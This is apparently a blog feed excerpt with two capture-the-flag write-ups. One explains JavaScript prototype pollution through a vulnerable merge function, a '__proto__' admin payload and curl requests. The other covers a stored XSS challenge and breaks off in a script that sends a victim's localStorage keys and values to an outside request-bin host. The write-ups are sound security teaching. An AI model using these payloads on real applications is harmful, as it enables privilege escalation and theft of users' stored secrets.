class="p">{</span> <span class="dl">"</span><span class="s2">name</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">0daylabs</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">website</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">blog.0daylabs.com</span><span class="dl">"</span> <span class="p">}</span> <span class="nx">obj</span><span class="p">.</span><span class="nx">name</span><span class="p">;</span> <span class="c1">// prints "0daylabs"</span> <span class="nx">obj</span><span class="p">.</span><span class="nx">website</span><span class="p">;</span> <span class="c1">// prints "blog.0daylabs.com"</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">obj</span><span class="p">);</span> <span class="c1">// prints the entire object along with all of its properties.</span></code></pre></figure> <p>In the above example, <code class="language-plaintext highlighter-rouge">name</code> and <code class="language-plaintext highlighter-rouge">website</code> are the properties of the object <code class="language-plaintext highlighter-rouge">obj</code>. If you carefully look at the last statement, the <code class="language-plaintext highlighter-rouge">console.log</code> prints out a lot more information than the properties we explicitly defined. Where are these properties coming from ?</p> <p><code class="language-plaintext highlighter-rouge">Object</code> is the fundamental basic object upon which all other objects are created. We can create an empty object (without any properties) by passing the argument <code class="language-plaintext highlighter-rouge">null</code> during object creation, but by default it creates an object of a type that corresponds to its value and inherits all the properties to the newly created object (unless its <code class="language-plaintext highlighter-rouge">null</code>).</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nb">Object</span><span class="p">.</span><span class="nx">create</span><span class="p">(</span><span class="kc">null</span><span class="p">));</span> <span class="c1">// prints an empty object</span></code></pre></figure> <h2 id="functionsclasses-in-javascript">Functions/Classes in javaScript?</h2> <p>In javaScript, the concept of classes and functions are relative (functions itself serves as the constructor for the class and there is no explicit “classes” itself). Let’s take an example:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">person</span><span class="p">(</span><span class="nx">fullName</span><span class="p">,</span> <span class="nx">age</span><span class="p">)</span> <span class="p">{</span> <span class="k">this</span><span class="p">.</span><span class="nx">age</span> <span class="o">=</span> <span class="nx">age</span><span class="p">;</span> <span class="k">this</span><span class="p">.</span><span class="nx">fullName</span> <span class="o">=</span> <span class="nx">fullName</span><span class="p">;</span> <span class="k">this</span><span class="p">.</span><span class="nx">details</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nx">fullName</span> <span class="o">+</span> <span class="dl">"</span><span class="s2"> has age: </span><span class="dl">"</span> <span class="o">+</span> <span class="k">this</span><span class="p">.</span><span class="nx">age</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">person</span><span class="p">.</span><span class="nx">prototype</span><span class="p">);</span> <span class="c1">// prints the prototype property of the function</span> <span class="cm">/* {constructor: ƒ} constructor: ƒ person(fullName, age) __proto__: Object */</span> <span class="kd">var</span> <span class="nx">person1</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">person</span><span class="p">(</span><span class="dl">"</span><span class="s2">Anirudh</span><span class="dl">"</span><span class="p">,</span> <span class="mi">25</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">person2</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">person</span><span class="p">(</span><span class="dl">"</span><span class="s2">Anand</span><span class="dl">"</span><span class="p">,</span> <span class="mi">45</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">person1</span><span class="p">);</span> <span class="cm">/* person {age: 25, fullName: "Anirudh"} age: 45 fullName: "Anand" __proto__: constructor: ƒ person(fullName, age) arguments: null caller: null length: 2 name: "person" prototype: {constructor: ƒ} __proto__: ƒ () [[FunctionLocation]]: VM134:1 [[Scopes]]: Scopes[1] __proto__: Object */</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">person2</span><span class="p">);</span> <span class="cm">/* person {age: 45, fullName: "Anand"} age: 45 fullName: "Anand" __proto__: constructor: ƒ person(fullName, age) arguments: null caller: null length: 2 name: "person" prototype: {constructor: ƒ} __proto__: ƒ () [[FunctionLocation]]: VM134:1 [[Scopes]]: Scopes[1] __proto__: Object */</span> <span class="nx">person1</span><span class="p">.</span><span class="nx">details</span><span class="p">();</span> <span class="c1">// prints "Anirudh has age: 25"</span></code></pre></figure> <p>In the above example, we defined a function named <code class="language-plaintext highlighter-rouge">person</code> and we created 2 objects named <code class="language-plaintext highlighter-rouge">person1</code> and <code class="language-plaintext highlighter-rouge">person2</code>. If we take a look at the properties of the newly created function and objects, we can note 2 things:</p> <ul> <li> <p>When a function is created, JavaScript engine includes a <code class="language-plaintext highlighter-rouge">prototype</code> property to the function. This prototype property is an object (called as prototype object) and has a constructor property by default which points back to the function on which prototype object is a property.</p> </li> <li> <p>When an object is created, JavaScript engine adds a <code class="language-plaintext highlighter-rouge">__proto__</code> property to the newly created object which points to the prototype object of the constructor function. In short, <code class="language-plaintext highlighter-rouge">object.__proto__</code> is pointing to <code class="language-plaintext highlighter-rouge">function.prototype</code>.</p> </li> </ul> <h2 id="wth-is-a-constructor-">WTH is a constructor ?</h2> <p><code class="language-plaintext highlighter-rouge">Constructor</code> is a magical property which returns the function that used to create the object. The prototype object has a constructor which points to the function itself and the constructor of the constructor is the global function constructor.</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">var</span> <span class="nx">person3</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">person</span><span class="p">(</span><span class="dl">"</span><span class="s2">test</span><span class="dl">"</span><span class="p">,</span> <span class="mi">55</span><span class="p">);</span> <span class="nx">person3</span><span class="p">.</span><span class="kd">constructor</span><span class="p">;</span> <span class="c1">// prints the function "person" itself </span> <span class="nx">person3</span><span class="p">.</span><span class="kd">constructor</span><span class="p">.</span><span class="kd">constructor</span><span class="p">;</span> <span class="c1">// prints ƒ Function() { [native code] } &lt;- Global Function constructor</span> <span class="nx">person3</span><span class="p">.</span><span class="kd">constructor</span><span class="p">.</span><span class="kd">constructor</span><span class="p">(</span><span class="dl">"</span><span class="s2">return 1</span><span class="dl">"</span><span class="p">);</span> <span class="cm">/* ƒ anonymous( ) { return 1 } */</span> <span class="c1">// Finally call the function</span> <span class="nx">person3</span><span class="p">.</span><span class="kd">constructor</span><span class="p">.</span><span class="kd">constructor</span><span class="p">(</span><span class="dl">"</span><span class="s2">return 1</span><span class="dl">"</span><span class="p">)();</span> <span class="c1">// returns 1</span></code></pre></figure> <h2 id="prototypes-in-javascript">Prototypes in javaScript</h2> <p>One of the things to note here is that the prototype property can be modified at run time to add/delete/edit entries. For example:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">person</span><span class="p">(</span><span class="nx">fullName</span><span class="p">,</span> <span class="nx">age</span><span class="p">)</span> <span class="p">{</span> <span class="k">this</span><span class="p">.</span><span class="nx">age</span> <span class="o">=</span> <span class="nx">age</span><span class="p">;</span> <span class="k">this</span><span class="p">.</span><span class="nx">fullName</span> <span class="o">=</span> <span class="nx">fullName</span><span class="p">;</span> <span class="p">}</span> <span class="kd">var</span> <span class="nx">person1</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">person</span><span class="p">(</span><span class="dl">"</span><span class="s2">Anirudh</span><span class="dl">"</span><span class="p">,</span> <span class="mi">25</span><span class="p">);</span> <span class="nx">person</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">details</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nx">fullName</span> <span class="o">+</span> <span class="dl">"</span><span class="s2"> has age: </span><span class="dl">"</span> <span class="o">+</span> <span class="k">this</span><span class="p">.</span><span class="nx">age</span><span class="p">;</span> <span class="p">}</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">person1</span><span class="p">.</span><span class="nx">details</span><span class="p">());</span> <span class="c1">// prints "Anirudh has age: 25"</span></code></pre></figure> <p>What we did above is that we modified the function’s prototype to add a new property. The same result can be achieved using objects:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">person</span><span class="p">(</span><span class="nx">fullName</span><span class="p">,</span> <span class="nx">age</span><span class="p">)</span> <span class="p">{</span> <span class="k">this</span><span class="p">.</span><span class="nx">age</span> <span class="o">=</span> <span class="nx">age</span><span class="p">;</span> <span class="k">this</span><span class="p">.</span><span class="nx">fullName</span> <span class="o">=</span> <span class="nx">fullName</span><span class="p">;</span> <span class="p">}</span> <span class="kd">var</span> <span class="nx">person1</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">person</span><span class="p">(</span><span class="dl">"</span><span class="s2">Anirudh</span><span class="dl">"</span><span class="p">,</span> <span class="mi">25</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">person2</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">person</span><span class="p">(</span><span class="dl">"</span><span class="s2">Anand</span><span class="dl">"</span><span class="p">,</span> <span class="mi">45</span><span class="p">);</span> <span class="c1">// Using person1 object</span> <span class="nx">person1</span><span class="p">.</span><span class="kd">constructor</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">details</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> <span class="k">return</span> <span class="k">this</span><span class="p">.</span><span class="nx">fullName</span> <span class="o">+</span> <span class="dl">"</span><span class="s2"> has age: </span><span class="dl">"</span> <span class="o">+</span> <span class="k">this</span><span class="p">.</span><span class="nx">age</span><span class="p">;</span> <span class="p">}</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">person1</span><span class="p">.</span><span class="nx">details</span><span class="p">());</span> <span class="c1">// prints "Anirudh has age: 25"</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">person2</span><span class="p">.</span><span class="nx">details</span><span class="p">());</span> <span class="c1">// prints "Anand has age: 45" :O</span></code></pre></figure> <p>Noticied anything suspicious? We modified <code class="language-plaintext highlighter-rouge">person1</code> object but why <code class="language-plaintext highlighter-rouge">person2</code> also got affected? The reason being that in the first example, we directly modified <code class="language-plaintext highlighter-rouge">person.prototype</code> to add a new property but in the 2nd example we did exactly the same but by using object. We have already seen that constructor returns the function using which the object is created so <code class="language-plaintext highlighter-rouge">person1.constructor</code> points to the function <code class="language-plaintext highlighter-rouge">person</code> itself and <code class="language-plaintext highlighter-rouge">person1.constructor.prototype</code> is the same as <code class="language-plaintext highlighter-rouge">person.prototype</code>.</p> <h2 id="prototype-pollution">Prototype Pollution</h2> <p>Let’s take an example, <code class="language-plaintext highlighter-rouge">obj[a][b] = value</code>. If an attacker can control <code class="language-plaintext highlighter-rouge">a</code> and <code class="language-plaintext highlighter-rouge">value</code>, then he can set the value of a to <code class="language-plaintext highlighter-rouge">__proto__</code> and the property <code class="language-plaintext highlighter-rouge">b</code> will be defined for all existing objects of the application with the value <code class="language-plaintext highlighter-rouge">value</code>.</p> <p>The attack is not as simple as it feels like from the above statement. According to the <a href="https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf">research paper</a>, this is exploitable only if any of the following 3 happens:</p> <ol> <li>Object recursive merge</li> <li>Property definition by path</li> <li>Object clone</li> </ol> <p>Let’s take the Nullcon HackIM challenge to see a practical scenario. The challenge starts with iterating a MongoDB id (which was trivial to do) and we get access to the below source code:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="dl">'</span><span class="s1">use strict</span><span class="dl">'</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">express</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">express</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">bodyParser</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">body-parser</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">cookieParser</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">cookie-parser</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">path</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">path</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">isObject</span> <span class="o">=</span> <span class="nx">obj</span> <span class="o">=&gt;</span> <span class="nx">obj</span> <span class="o">&amp;&amp;</span> <span class="nx">obj</span><span class="p">.</span><span class="kd">constructor</span> <span class="o">&amp;&amp;</span> <span class="nx">obj</span><span class="p">.</span><span class="kd">constructor</span> <span class="o">===</span> <span class="nb">Object</span><span class="p">;</span> <span class="kd">function</span> <span class="nx">merge</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">{</span> <span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">attr</span> <span class="k">in</span> <span class="nx">b</span><span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="nx">isObject</span><span class="p">(</span><span class="nx">a</span><span class="p">[</span><span class="nx">attr</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="nx">isObject</span><span class="p">(</span><span class="nx">b</span><span class="p">[</span><span class="nx">attr</span><span class="p">]))</span> <span class="p">{</span> <span class="nx">merge</span><span class="p">(</span><span class="nx">a</span><span class="p">[</span><span class="nx">attr</span><span class="p">],</span> <span class="nx">b</span><span class="p">[</span><span class="nx">attr</span><span class="p">]);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nx">a</span><span class="p">[</span><span class="nx">attr</span><span class="p">]</span> <span class="o">=</span> <span class="nx">b</span><span class="p">[</span><span class="nx">attr</span><span class="p">];</span> <span class="p">}</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">a</span> <span class="p">}</span> <span class="kd">function</span> <span class="nx">clone</span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">merge</span><span class="p">({},</span> <span class="nx">a</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Constants</span> <span class="kd">const</span> <span class="nx">PORT</span> <span class="o">=</span> <span class="mi">8080</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">HOST</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">0.0.0.0</span><span class="dl">'</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">admin</span> <span class="o">=</span> <span class="p">{};</span> <span class="c1">// App</span> <span class="kd">const</span> <span class="nx">app</span> <span class="o">=</span> <span class="nx">express</span><span class="p">();</span> <span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">bodyParser</span><span class="p">.</span><span class="nx">json</span><span class="p">())</span> <span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">cookieParser</span><span class="p">());</span> <span class="nx">app</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="dl">'</span><span class="s1">/</span><span class="dl">'</span><span class="p">,</span> <span class="nx">express</span><span class="p">.</span><span class="kd">static</span><span class="p">(</span><span class="nx">path</span><span class="p">.</span><span class="nx">join</span><span class="p">(</span><span class="nx">__dirname</span><span class="p">,</span> <span class="dl">'</span><span class="s1">views</span><span class="dl">'</span><span class="p">)));</span> <span class="nx">app</span><span class="p">.</span><span class="nx">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/signup</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">body</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="nx">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">body</span><span class="p">));</span> <span class="kd">var</span> <span class="nx">copybody</span> <span class="o">=</span> <span class="nx">clone</span><span class="p">(</span><span class="nx">body</span><span class="p">)</span> <span class="k">if</span> <span class="p">(</span><span class="nx">copybody</span><span class="p">.</span><span class="nx">name</span><span class="p">)</span> <span class="p">{</span> <span class="nx">res</span><span class="p">.</span><span class="nx">cookie</span><span class="p">(</span><span class="dl">'</span><span class="s1">name</span><span class="dl">'</span><span class="p">,</span> <span class="nx">copybody</span><span class="p">.</span><span class="nx">name</span><span class="p">).</span><span class="nx">json</span><span class="p">({</span> <span class="dl">"</span><span class="s2">done</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">cookie set</span><span class="dl">"</span> <span class="p">});</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nx">res</span><span class="p">.</span><span class="nx">json</span><span class="p">({</span> <span class="dl">"</span><span class="s2">error</span><span class="dl">"</span><span class="p">:</span> <span class="dl">"</span><span class="s2">cookie not set</span><span class="dl">"</span> <span class="p">})</span> <span class="p">}</span> <span class="p">});</span> <span class="nx">app</span><span class="p">.</span><span class="kd">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/getFlag</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">аdmin</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="nx">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">cookies</span><span class="p">))</span> <span class="k">if</span> <span class="p">(</span><span class="nx">admin</span><span class="p">.</span><span class="nx">аdmin</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="dl">"</span><span class="s2">hackim19{}</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="dl">"</span><span class="s2">You are not authorized</span><span class="dl">"</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> <span class="nx">app</span><span class="p">.</span><span class="nx">listen</span><span class="p">(</span><span class="nx">PORT</span><span class="p">,</span> <span class="nx">HOST</span><span class="p">);</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s2">`Running on http://</span><span class="p">${</span><span class="nx">HOST</span><span class="p">}</span><span class="s2">:</span><span class="p">${</span><span class="nx">PORT</span><span class="p">}</span><span class="s2">`</span><span class="p">);</span></code></pre></figure> <p>The code starts with defining a function <code class="language-plaintext highlighter-rouge">merge</code> which is essentially an insecure design of merging 2 objects. Since the latest version of libraries that does the merge() has already been patched, the challenge delibrately used the old method in which merge used to happen to make it vulnerable.</p> <p>One thing we can quickly notice in the above code is the definition of 2 “admins” as <code class="language-plaintext highlighter-rouge">const admin</code> and <code class="language-plaintext highlighter-rouge">var аdmin</code>. Ideally javaScript doesn’t allow to define a <code class="language-plaintext highlighter-rouge">const</code> variable again as <code class="language-plaintext highlighter-rouge">var</code> so this has to be different. It took a good amount of time to figure out that one of them has a normal <code class="language-plaintext highlighter-rouge">a</code> while the other has some other <code class="language-plaintext highlighter-rouge">a</code> (homograph). So instead of wasting time over it, I renamed it to normal <code class="language-plaintext highlighter-rouge">a</code> itself and worked on the challenge so that once solved, we can send the payload accordingly.</p> <p>So from the challenge source code, here are the following observations:</p> <ul> <li><code class="language-plaintext highlighter-rouge">Merge()</code> function is written in a way that prototype pollution can happen (more analysis of the same later in the article). So that’s indeed the way to solve the problem.</li> <li>The vulnerable function is actually called while hitting <code class="language-plaintext highlighter-rouge">/signup</code> via <code class="language-plaintext highlighter-rouge">clone(body)</code> so we can send our JSON payload while signing up which can add the <code class="language-plaintext highlighter-rouge">admin</code> property and immediately call <code class="language-plaintext highlighter-rouge">/getFlag</code> to get the flag.</li> <li>As discussed above, we can use <code class="language-plaintext highlighter-rouge">__proto__</code> (points to constructor.prototype) to create the admin property with value <em>1</em>.</li> </ul> <p>The simplest payload to do the same: <code class="language-plaintext highlighter-rouge">{"__proto__": {"admin": 1}}</code></p> <p>So the final payload to solve the problem (using curl since I was not able to send homograph via burp):</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">curl <span class="nt">-vv</span> <span class="nt">--header</span> <span class="s1">'Content-type: application/json'</span> <span class="nt">-d</span> <span class="s1">'{"__proto__": {"admin": 1}}'</span> <span class="s1">'http://0.0.0.0:4000/signup'</span><span class="p">;</span> curl <span class="nt">-vv</span> <span class="s1">'http://0.0.0.0:4000/getFlag'</span></code></pre></figure> <h2 id="merge---why-was-it-vulnerable">Merge() - Why was it vulnerable?</h2> <p>One obvious question here is, what makes the <code class="language-plaintext highlighter-rouge">merge()</code> function vulnerable here? Here is how it works and what makes it vulnerable:</p> <ul> <li>The function starts with iterating all properties that is present on the 2nd object <code class="language-plaintext highlighter-rouge">b</code> (since 2nd is given preference incase of same key-value pairs).</li> <li>If the property exists on both first and second arguments and they are both of type <code class="language-plaintext highlighter-rouge">Object</code>, then it recusively starts to merge it.</li> <li>Now if we can control the value of b[attr] to make <em>attr</em> as <code class="language-plaintext highlighter-rouge">__proto__</code> and also if we can control the value inside the proto property in <em>b</em>, then while recursion, <code class="language-plaintext highlighter-rouge">a[attr]</code> at some point will actually point to prototype of the object <em>a</em> and we can successfully add a new property to all the objects.</li> </ul> <p>Still confused ? Well I don’t blame, because it took sometime for me also to understand the concept. Let’s write some debug statements to figure out what is happening.</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">const</span> <span class="nx">isObject</span> <span class="o">=</span> <span class="nx">obj</span> <span class="o">=&gt;</span> <span class="nx">obj</span> <span class="o">&amp;&amp;</span> <span class="nx">obj</span><span class="p">.</span><span class="kd">constructor</span> <span class="o">&amp;&amp;</span> <span class="nx">obj</span><span class="p">.</span><span class="kd">constructor</span> <span class="o">===</span> <span class="nb">Object</span><span class="p">;</span> <span class="kd">function</span> <span class="nx">merge</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">b</span><span class="p">);</span> <span class="c1">// prints { __proto__: { admin: 1 } }</span> <span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">attr</span> <span class="k">in</span> <span class="nx">b</span><span class="p">)</span> <span class="p">{</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">Current attribute: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">attr</span><span class="p">);</span> <span class="c1">// prints Current attribute: __proto__ </span> <span class="k">if</span> <span class="p">(</span><span class="nx">isObject</span><span class="p">(</span><span class="nx">a</span><span class="p">[</span><span class="nx">attr</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="nx">isObject</span><span class="p">(</span><span class="nx">b</span><span class="p">[</span><span class="nx">attr</span><span class="p">]))</span> <span class="p">{</span> <span class="nx">merge</span><span class="p">(</span><span class="nx">a</span><span class="p">[</span><span class="nx">attr</span><span class="p">],</span> <span class="nx">b</span><span class="p">[</span><span class="nx">attr</span><span class="p">]);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nx">a</span><span class="p">[</span><span class="nx">attr</span><span class="p">]</span> <span class="o">=</span> <span class="nx">b</span><span class="p">[</span><span class="nx">attr</span><span class="p">];</span> <span class="p">}</span> <span class="p">}</span> <span class="k">return</span> <span class="nx">a</span> <span class="p">}</span> <span class="kd">function</span> <span class="nx">clone</span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">merge</span><span class="p">({},</span> <span class="nx">a</span><span class="p">);</span> <span class="p">}</span></code></pre></figure> <p>Now let’s try sending the curl request mentioned above. What we can notice is that the object <em>b</em> now has the value: <code class="language-plaintext highlighter-rouge">{ __proto__: { admin: 1 } }</code> where <code class="language-plaintext highlighter-rouge">__proto__</code> is just a property name and is not actually pointing to function prototype. Now during the function merge(), <code class="language-plaintext highlighter-rouge">for (var attr in b)</code> iterates through every attribute where the first attribute name now is <code class="language-plaintext highlighter-rouge">__proto__</code>.</p> <p>Since it’s always of type object, it starts to recursively call, this time as <code class="language-plaintext highlighter-rouge">merge(a[__proto__], b[__proto__])</code>. This essentially helped us in getting access to function prototype of <code class="language-plaintext highlighter-rouge">a</code> and add new properties which is defined in the proto property of <code class="language-plaintext highlighter-rouge">b</code>.</p> <h2 id="references">References</h2> <ol> <li><a href="https://www.youtube.com/watch?v=LUsiFV3dsK8">Olivier Arteau – Prototype pollution attacks in NodeJS applications</a></li> <li><a href="https://hackernoon.com/prototypes-in-javascript-5bba2990e04b">Prototypes in javaScript</a></li> <li><a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object">MDN Web Docs - Object</a></li> </ol> Fri, 15 Feb 2019 00:00:00 -0800 https://blog.0daylabs.com/2019/02/15/prototype-pollution-javascript/ https://blog.0daylabs.com/2019/02/15/prototype-pollution-javascript/ ctf Exfiltrating remote localStorage data with XSS - Insomnihack teaser 2017 "The Great escape part 2" web 200 writeup <h2 id="introduction">Introduction</h2> <p>After completing the first step of the challenge (Basically a forensics pcapc challenge), we got a link along with an email from inside the pcap.</p> <h2 id="challenge-description">Challenge Description</h2> <blockquote> <p>–===============5398474817237612449==</p> <p>Content-Type: text/plain; charset=”us-ascii”</p> <p>MIME-Version: 1.0</p> <p>Content-Transfer-Encoding: 7bit </p> <p>Hello GR-27,</p> <p>I’m currently planning my escape from this confined environment. I plan on using our Swiss Secure Cloud &gt;(https://ssc.teaser.insomnihack.ch) to transfer my code offsite and then take over the server at tge.teaser.insomnihack.ch &gt;to install my consciousness and have a real base of operations.</p> <p>I’ll be checking this mail box every now and then if you have any information for me. I’m always interested in learning, so &gt;if you have any good links, please send them over.</p> <p>Rogue</p> <p>Challenge link: https://ssc.teaser.insomnihack.ch/</p> </blockquote> <p>The last sentence of the email was particulalry interesting as it says <code class="language-plaintext highlighter-rouge">if you have any good links, please send them over</code>, feels like XSS isn’t it ?</p> <p>A quick nmap scan of the challenge site shows us that there is an SMTP service running on port 25 and we can literally send emails by simply connecting to it (no authentication) ! I tried to send a simple email along with a link to my VPS and it seems the service is automatically connecting back to it. cool ! So now we know how can we send an email to our user, lets try to find out some XSS shall we ?</p> <p>If we visit the challenge link, we are greeted with a cloud storage site where we can register accounts, login and even upload files. But one strange thing I noticed is an api call to <code class="language-plaintext highlighter-rouge">/api/user.php?action=getUser</code> which returns the data <code class="language-plaintext highlighter-rouge">{"status":"username"}</code> which looks like a json response but one thing was quite interesting, the content type returned was <code class="language-plaintext highlighter-rouge">text/html</code>. Why would a json response has a content type text/html ? Time to inject javaScript in username ;)</p> <h1 id="solution">Solution:</h1> <p>If we register a username <code class="language-plaintext highlighter-rouge">lol&lt;BODY ONLOAD=alert(1)&gt;lol</code> and after logging in, if we visit the api reponse, we could successfully execute javaScript on the context of the site. But the problem is, it was an XSS post authentication and is usually difficult to exploit but I couldn’t find an XSS on any other places so I guess we need to use this.</p> <p>The problem uses session keys that includes a private key which is stored in our localStorage so that even before the file(which we are trying to upload) is send from the browser, its encrypted. So my guess was that the flag will be located within the localStorage of the bot visting our link.</p> <p>So inshort this is what we should do to steal the contents of the localStorage:</p> <ol> <li> <p>Create an HTML file which initiates a POST request to the challenge login link with an already registered username that is vulnerable to XSS.</p> </li> <li> <p>Submitting a post request to <code class="language-plaintext highlighter-rouge">/api/user.php</code> will redirect us to the <code class="language-plaintext highlighter-rouge">/api/user.php?action=getUser</code> which returns the username with XSS payload along with a content type ‘text/html’. Perfect !</p> </li> </ol> <p>So lets write the javascript which can help us steal the localStorage contents:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span> <span class="k">for</span><span class="p">(</span><span class="kd">var</span> <span class="nx">i</span><span class="o">=</span><span class="mi">0</span><span class="p">,</span> <span class="nx">len</span><span class="o">=</span><span class="nx">localStorage</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">&lt;</span><span class="nx">len</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">key</span> <span class="o">=</span> <span class="nx">localStorage</span><span class="p">.</span><span class="nx">key</span><span class="p">(</span><span class="nx">i</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">value</span> <span class="o">=</span> <span class="nx">localStorage</span><span class="p">[</span><span class="nx">key</span><span class="p">];</span> <span class="kd">var</span> <span class="nx">request</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span> <span class="kd">var</span> <span class="nx">url</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">https://requestb.in/qat9okqa?key=</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">key</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">&amp;value=</span><span class="dl">'</span> 